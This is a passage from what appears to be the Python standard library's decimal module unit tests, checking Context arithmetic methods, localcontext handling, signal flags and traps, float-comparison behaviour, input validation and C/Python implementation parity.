self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstring tests until Python 2.6,
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags before calling the operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
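# Compare Decimal `a` with float `b` via the rich-comparison method
# `attr`: the mixed comparison must set the FloatOperation flag, and
# must raise FloatOperation when that signal is trapped.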
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation = self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
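# setcontext() with a template should install a working copy, so
# getcontext() must never return the template object itself.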
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
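# All operations below go through the implicit (thread-local) context, so
# results are rounded to a single significant digit within the tiny
# exponent range [-1, 1].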
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
